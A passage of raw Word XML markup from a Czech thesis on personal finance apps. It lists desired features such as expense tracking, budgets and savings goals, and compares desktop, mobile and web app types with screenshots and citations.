        <w:t>takto</w:t>
      </w:r>
      <w:r w:rsidR="00AF3463">
        <w:t xml:space="preserve"> osobních dat představuje velký problém, protože mohou být snadno zneužita. Žádný uživatel nebude svěřovat svá důvěrná data aplikaci, která jej nepřesvědčí o vysoké úrovni jejich zabezpečení.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72D9F" w:rsidRDefault="00D72D9F" w:rsidP="00C87C8B">
      <w:r>
        <w:t>Co se funkčníc</w:t>
      </w:r>
      <w:r w:rsidR="00B31639">
        <w:t xml:space="preserve">h požadavků týče, tak základem </w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t>všech</w:t>
      </w:r>
      <w:r w:rsidR="00B31639">
        <w:t xml:space="preserve"> aplikac</w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="00B31639">
        <w:t xml:space="preserve"> pro správu financí je evidence příjmů a výdajů v čase. Téměř každý má pravidelné příjmy nebo výdaje, jistá automatizace evidence těchto položek se tudíž přímo nabízí. </w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00B31639">
        <w:t xml:space="preserve">plikace by měla </w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t>zvládat</w:t>
      </w:r>
      <w:r w:rsidR="00B31639">
        <w:t xml:space="preserve"> pracovat </w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t>s více</w:t>
      </w:r>
      <w:r w:rsidR="00B31639">
        <w:t xml:space="preserve"> bankovním</w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00B31639">
        <w:t xml:space="preserve"> účt</w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00B31639">
        <w:t>, kter</w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t>é mohou chtít uživatelé evidovat zvlášť (hotovost může být považována</w:t>
      </w:r>
      <w:r w:rsidR="00DC004C">
        <w:t xml:space="preserve"> také</w:t>
      </w:r>
      <w:r w:rsidR="00093E28">
        <w:t xml:space="preserve"> za zvláštní účet).</w:t>
      </w:r>
      <w:r w:rsidR="008F2FB5">
        <w:t xml:space="preserve"> Jisté zjednodušení by uživateli přinesl </w:t>
      </w:r>
      <w:r w:rsidR="008F2FB5">
        <w:lastRenderedPageBreak/>
        <w:t>automatický import dat z výpisů bankovních účtů.</w:t>
      </w:r>
      <w:r w:rsidR="00D35D70">
        <w:t xml:space="preserve"> Důležitá je i možnost exportu dat pro případ, že by uživatel již nechtěl aplikaci dále používat, ale chtěl by si archivovat svá data.</w:t>
      </w:r>
      <w:r w:rsidR="00DC004C">
        <w:t xml:space="preserve"> V tomto případě by mu také mělo být umožněno uživatelský účet zrušit a všechna data odstranit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35D70" w:rsidRDefault="00D35D70" w:rsidP="00C87C8B">
      <w:r>
        <w:t xml:space="preserve">Samotná elektronická evidence příjmů a výdajů uživateli nepřináší nic navíc oproti například papírové evidenci (která může být v podstatě i ve formě archivovaných účtenek a výplatních pásek). Teprve možnost agregovaného přehledu příjmů a výdajů dává uživateli motivaci aplikaci reálně používat. Tento přehled může být v nejjednodušší verzi například jen součtem příjmů a výdajů ve zvoleném časovém období. </w:t>
      </w:r>
      <w:r w:rsidR="00F016B6">
        <w:t>Mnohem větší možnosti se ale nabízí v případě, kdy by jednotlivé příjmy a výdaje byly kategorizované. Například vývoj nákladů na bydlení a stravu v čase je pro uživatele určitě zajímavější, než prostá tabulka se všemi výdaji. Ještě lepší by bylo, kdyby tyhle přehledy uměla aplikace nabídnout v atraktivní grafické formě.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4613" w:rsidRDefault="00E82AAA" w:rsidP="00C87C8B">
      <w:r>
        <w:t>Od retrospektivního přehledu příjmů a výdajů je jen krůček k jejich plánování</w:t>
      </w:r>
      <w:r w:rsidR="00F75754">
        <w:t xml:space="preserve"> do budoucnosti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00501B76">
        <w:t xml:space="preserve">Aplikace by tedy měla </w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t>zvládnout</w:t>
      </w:r>
      <w:r w:rsidR="00501B76">
        <w:t xml:space="preserve"> vytváření časově ohraničených rozpočtů na jednotlivé kategorie výdajů a v případě překročení stanoveného rozpočtu uživatele upozornit. Kromě rozpočtu, který může být chápán jako restrikce na straně výdajů, by bylo možné podobný systém využít i na straně příjmů, při budování finančních rezerv nebo spoření. Například pokud by si uživatel stanovil cíl během příštího roku naspořit určitou částku na nové auto, viděl by, kolik peněz již má naspořeno a kolik mu ještě k jeho cíli zbývá ušetřit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00501B76" w:rsidRDefault="00227736" w:rsidP="00C87C8B">
      <w:r>
        <w:t>Z</w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve">ajímavou funkcionalitou by mohla být evidence nákladů </w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve">a provoz zařízení, která vyžadují pravidelnou údržbu nebo investice. Typickým příkladem může být automobil, který má stanovený plán pravidelné údržby a </w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t xml:space="preserve">je zatížen </w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t>další</w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t>mi</w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve"> provozní</w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t>mi</w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve"> náklady </w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t xml:space="preserve">jako jsou pohonné hmoty, pojištění, </w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve">dálniční poplatky </w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t>apod</w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve">. Všechny náklady </w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t>související</w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve">automobilem budou v systému již evidované a stačí je použít například </w:t>
      </w:r>
      <w:r w:rsidR="00107A2E">
        <w:t>pro</w:t>
      </w:r>
      <w:r w:rsidR="00457443">
        <w:t xml:space="preserve"> spočítání průměrných nákladů za ujetý kilometr včetně amortizace automobilu. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD54FE" w:rsidRDefault="00227736" w:rsidP="00C87C8B">
      <w:r>
        <w:t xml:space="preserve">Dalším usnadněním by pro uživatele mohla být například evidence pohledávek a dluhů nebo spotřeby energií v domácnosti. </w:t>
      </w:r>
      <w:r w:rsidR="001D7CF7">
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>istě</w:t>
      </w:r>
      <w:r w:rsidR="001D7CF7">
        <w:t xml:space="preserve"> existuje spousta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> další</w:t>
      </w:r>
      <w:r w:rsidR="001D7CF7">
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> možnost</w:t>
      </w:r>
      <w:r w:rsidR="001D7CF7">
        <w:t>í</w:t>
      </w:r>
      <w:r>
        <w:t>, které jsem nezmínil</w:t>
      </w:r>
      <w:r w:rsidR="001D7CF7">
        <w:t>, nicméně v dnešní době jsou úspěšné především aplikace, které se snaží řešit jeden problém, ale řeší jej</w:t>
      </w:r>
      <w:r w:rsidR="00097964">
        <w:t xml:space="preserve"> opravdu dobře</w:t>
      </w:r>
      <w:r w:rsidR="00D91CFA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C87C8B" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc387327789"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Typy aplikací pro správu financí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="00DE183F" w:rsidRDefault="00DE183F" w:rsidP="00DE183F">
      <w:r>
        <w:t xml:space="preserve">Dostupné aplikace pro správu osobních financí by se daly rozdělit do tří skupin podle </w:t>
      </w:r>
      <w:r w:rsidR="00D27E09">
        <w:t xml:space="preserve">způsobu jejich použití a distribuce. Jsou to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D27E09">
        <w:t>desktopové</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D27E09">
        <w:t xml:space="preserve"> aplikace, mobilní aplikace a</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D27E09">
        <w:t>webové aplikace. Každá z těchto skupin je něčím specifická.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D27E09" w:rsidRDefault="00D27E09" w:rsidP="00D27E09">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc387327790"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Desktopové</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aplikace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="00B423B8" w:rsidRDefault="00E25EF2" w:rsidP="00B423B8">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jedná se o programy pro stolní počítače </w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> notebooky. Většinou se musí instalovat, což samo o sobě může někte</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t xml:space="preserve">ré nezkušené uživatele odradit. Výhoda těchto aplikací je současně jejich nevýhodou – všechna data jsou uložena pouze lokálně na daném počítači. To znamená, že nad nimi uživatel </w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA">
        <w:t xml:space="preserve">má </w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t>plnou kontrolu a žádná třetí osoba</w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA" w:rsidRPr="00D04BDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA">
        <w:t>k nim nemá přístup</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t>. Nevýhodou tohoto řešení je, že uživatel zadáv</w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA">
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t xml:space="preserve"> data pouze na </w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA">
        <w:t>svém</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t xml:space="preserve"> počítači</w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA">
        <w:t>To</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t xml:space="preserve"> může být velmi nepraktické například na dovolené nebo služební cestě</w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D04BDA">
        <w:t>kdy je nutné</w:t>
      </w:r>
      <w:r w:rsidR="00A77862">
        <w:t xml:space="preserve"> výdaje evidovat nějakým jiným způsobem a poté je zpětně zaznamenat do aplikace.</w:t>
      </w:r>
      <w:r w:rsidR="00C7078C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7AEF">
        <w:t>Taktéž</w:t>
      </w:r>
      <w:r w:rsidR="00C7078C">
        <w:t xml:space="preserve"> o zálohování těchto dat se uživatel musí starat sám.</w:t>
      </w:r>
      <w:r w:rsidR="00986C98" w:rsidRPr="00986C98">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B423B8" w:rsidRDefault="00B423B8" w:rsidP="00B423B8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B423B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5459095" cy="3639127"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="18473"/>
            <wp:docPr id="9" name="obrázek 1" descr="http://www.rq.sk/images/nahlad_velk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q.sk/images/nahlad_velky.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16" cstate="print"/>
                    <a:srcRect l="1149" t="1478" r="981" b="1478"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5459095" cy="3639127"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00986C98" w:rsidRPr="00B423B8" w:rsidRDefault="00B423B8" w:rsidP="00B423B8">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc387327909"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B423B8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00986C98">
        <w:t>Ukázka</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> programu RQ Money.</w:t>
      </w:r>
      <w:r w:rsidR="004D1C97">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13468216"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION UXdnyjNCv2ie9ODJ \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[4]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="00C7078C" w:rsidRDefault="00C7078C" w:rsidP="00D27E09">
      <w:r>
        <w:t xml:space="preserve">Tyto aplikace většinou vznikly ještě před masivním </w:t>
      </w:r>
      <w:r w:rsidR="00B053CC">
        <w:t>rozšířením</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chytrých mobilních telefonů a z hlediska uživatelské přívětivosti jsou dnes poměrně zastaralé. Typickým </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>zástupcem tohoto druhu aplikací je například velmi rozšířený Microsoft Excel nebo specializovaná aplikace RQ Money</w:t>
      </w:r>
      <w:r w:rsidR="004D1C97">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13468238"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION UXdnyjNCv2ie9ODJ \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[4]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B053CC" w:rsidRDefault="00B053CC" w:rsidP="00B053CC">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc387327791"/>
      <w:r>
        <w:t>Mobilní aplikace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00B053CC" w:rsidRDefault="00B053CC" w:rsidP="00B053CC">
      <w:r>
        <w:t xml:space="preserve">Mobilní aplikace pro správu financí začaly vznikat po širokém rozšíření chytrých mobilních telefonů. Existuje mnoho takových aplikací pro </w:t>
      </w:r>
      <w:r w:rsidR="006A7AEF">
        <w:t>všechny</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7AEF">
        <w:t>běžné</w:t>
      </w:r>
      <w:r w:rsidR="00520EFB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A7AEF">
        <w:t>operační systémy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jak</w:t>
      </w:r>
      <w:r w:rsidR="006A7AEF">
        <w:t>ými je</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Android, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Phone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00551418">
        <w:t>Přístup k datům je u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> těchto aplikací podobný jako u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>desktopových</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aplikací </w:t>
      </w:r>
      <w:r w:rsidR="00B9476B">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B9476B">
        <w:t xml:space="preserve">uživatel aplikaci nainstaluje do svého zařízení a data jsou uložena přímo </w:t>
      </w:r>
      <w:r w:rsidR="00551418">
        <w:t>na jeho lokálním</w:t>
      </w:r>
      <w:r w:rsidR="00B9476B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00551418">
        <w:t>úložišti</w:t>
      </w:r>
      <w:r w:rsidR="00B9476B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00551418">
        <w:t xml:space="preserve"> Samotná instalace nečiní problém ani nezkušeným uživatelům, protože probíhá plně automaticky po zvolení požadované aplikace v rep</w:t>
      </w:r>
      <w:r w:rsidR="00481AB8">
        <w:t>ositáři dané platformy (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00481AB8">
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00481AB8">
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="00551418">
        <w:t xml:space="preserve">lay, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00551418">
        <w:t>App</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00551418">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00551418">
        <w:t>Store</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00551418">
        <w:t xml:space="preserve"> nebo Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00551418">
        <w:t>Store</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00551418">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00551418" w:rsidRDefault="00551418" w:rsidP="00B053CC">
      <w:r>
        <w:t xml:space="preserve">Oproti </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>desktopovým</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aplikacím mají mobilní aplikace výhodu v tom, že mobilní telefon nosí většinou lidé stále u sebe a proto mohou evidovat své výdaje bezprostředně po jejich vzniku a nemusí je zadávat zpětně. Omezením je u nich většinou velikost displeje mobilních telefonů, které nejsou vhodné k zobrazování velkého množství dat.</w:t>
      </w:r>
      <w:r w:rsidR="00481AB8">
        <w:t xml:space="preserve"> Představitelem takové aplikace je například My Budget </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00481AB8">
        <w:t>Book</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00481AB8">
        <w:t xml:space="preserve">, což je aktuálně nejoblíbenější aplikace </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00481AB8">
        <w:t>Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00481AB8">
        <w:t xml:space="preserve"> play v kategorii </w:t>
      </w:r>
      <w:r w:rsidR="002C3305">
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00481AB8">
        <w:t>inance</w:t>
      </w:r>
      <w:r w:rsidR="005B0FF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13468307"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION TewJQFLWmgWb9FRs \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[5]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00481AB8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00481AB8" w:rsidRDefault="00481AB8" w:rsidP="00481AB8">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1751412" cy="3115159"/>
            <wp:effectExtent l="19050" t="0" r="1188" b="0"/>
            <wp:docPr id="2" name="Obrázek 1" descr="my budget book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 budget book1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1752586" cy="3117248"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1749031" cy="3110924"/>
            <wp:effectExtent l="19050" t="0" r="3569" b="0"/>
            <wp:docPr id="5" name="Obrázek 2" descr="my budget book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 budget book2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1751964" cy="3116140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00481AB8" w:rsidRDefault="00481AB8" w:rsidP="00481AB8">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc387327910"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">. Ukázka mobilní aplikace My Budget </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Book</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005B0FF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13468332"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION TewJQFLWmgWb9FRs \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[5]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="00C7078C" w:rsidRDefault="007642A0" w:rsidP="0068558D">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc387327792"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Webové aplikace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="0068558D" w:rsidRDefault="00977486" w:rsidP="0068558D">
      <w:r>
        <w:t>Webové</w:t>
      </w:r>
      <w:r w:rsidR="0068558D">
        <w:t xml:space="preserve"> aplikace se od zástupců předchozích dvou kategorií zásadně odlišují. Jedná se o serverové aplikace, které jsou hostované buď na dedikovaných serverech nebo v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0068558D">
        <w:t>cloudu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0068558D">
        <w:t>. Uživatel k nim přistupuje přes internetový prohlížeč, nemusí tedy nic instalovat a s aplikací může pracovat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z jakéhokoliv zařízení, které je</w:t>
      </w:r>
      <w:r w:rsidR="0068558D">
        <w:t xml:space="preserve"> připojen</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="0068558D">
        <w:t xml:space="preserve"> k internetu. To </w:t>
      </w:r>
      <w:r w:rsidR="00631957">
        <w:t xml:space="preserve">dnes </w:t>
      </w:r>
      <w:r w:rsidR="0068558D">
        <w:t xml:space="preserve">znamená nejen z domácích počítačů, ale také z mobilních telefonů. </w:t>
      </w:r>
      <w:r w:rsidR="00631957">
        <w:t>Pokud má aplikace navíc optimalizovanou mobilní verzi, je práce s ní na mobilním telefonu stej</w:t>
      </w:r>
      <w:r w:rsidR="00755312">
        <w:t>ně pohodlná</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jako s klasickou </w:t>
      </w:r>
      <w:r w:rsidR="00631957">
        <w:t>instalovanou mobilní aplikací.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00587D83" w:rsidRDefault="00631957" w:rsidP="0068558D">
      <w:r>
        <w:t>Nevýhodou těchto aplikací může být z hlediska některých uživatelů fakt, že nemají svá data pod plnou kontrolou. Ta jsou uložena na serverech třetí strany a přestože autoři aplikac</w:t>
      </w:r>
      <w:r w:rsidR="00977486">
